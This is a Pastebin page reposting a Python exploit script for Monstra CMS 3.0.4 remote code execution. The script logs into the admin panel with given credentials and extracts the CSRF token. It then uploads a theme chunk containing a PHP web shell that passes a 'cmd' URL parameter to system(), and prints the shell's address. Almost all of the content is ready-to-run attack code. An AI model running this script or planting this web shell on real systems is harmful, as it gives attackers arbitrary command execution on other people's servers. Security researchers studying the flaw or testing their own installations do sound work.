API tools faq
paste
Advertisement
FlyFar

Monstra CMS 3.0.4 - Remote Code Execution (RCE)

FlyFar
Jun 8th, 2024
437
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.99 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. # Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)
  2. # Date: 05.05.2024
  3. # Exploit Author: Ahmet Ümit BAYRAM
  4. # Vendor Homepage: https://monstra.org/
  5. # Software Link: https://monstra.org/monstra-3.0.4.zip
  6. # Version: 3.0.4
  7. # Tested on: MacOS
  8.  
  9. import requests
  10. import random
  11. import string
  12. import time
  13. import re
  14. import sys
  15.  
  16. if len(sys.argv) < 4:
  17. print("Usage: python3 script.py <url> <username> <password>")
  18. sys.exit(1)
  19.  
  20. base_url = sys.argv[1]
  21. username = sys.argv[2]
  22. password = sys.argv[3]
  23.  
  24. session = requests.Session()
  25.  
  26. login_url = f'{base_url}/admin/index.php?id=dashboard'
  27. login_data = {
  28. 'login': username,
  29. 'password': password,
  30. 'login_submit': 'Log+In'
  31. }
  32.  
  33. filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=
  34. 5))
  35.  
  36. print("Logging in...")
  37. response = session.post(login_url, data=login_data)
  38.  
  39. if 'Dashboard' in response.text:
  40. print("Login successful")
  41. else:
  42. print("Login failed")
  43. exit()
  44.  
  45. time.sleep(3)
  46.  
  47. edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'
  48. response = session.get(edit_url) # CSRF token bulmak için edit sayfasına
  49. erişim
  50.  
  51. token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="
  52. (.*?)"', response.text)
  53. if token_search:
  54. token = token_search.group(1)
  55. else:
  56. print("CSRF token could not be found.")
  57. exit()
  58.  
  59. content = '''
  60. <html>
  61. <body>
  62. <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
  63. <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
  64. <input type="SUBMIT" value="Execute">
  65. </form>
  66. <pre>
  67. <?php
  68. if(isset($_GET['cmd']))
  69. {
  70. system($_GET['cmd']);
  71. }
  72. ?>
  73. </pre>
  74. </body>
  75. </html>
  76. '''
  77.  
  78. edit_data = {
  79. 'csrf': token,
  80. 'name': filename,
  81. 'content': content,
  82. 'add_file': 'Save'
  83. }
  84.  
  85. print("Preparing shell...")
  86. response = session.post(edit_url, data=edit_data)
  87. time.sleep(3)
  88.  
  89. if response.status_code == 200:
  90. print(f"Your shell is ready: {base_url}/public/themes/default/{filename}
  91. .chunk.php")
  92. else:
  93. print("Failed to prepare shell.")
  94.            
Tags: Exploit CVE Vulnerability RCE Monstra CMS
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!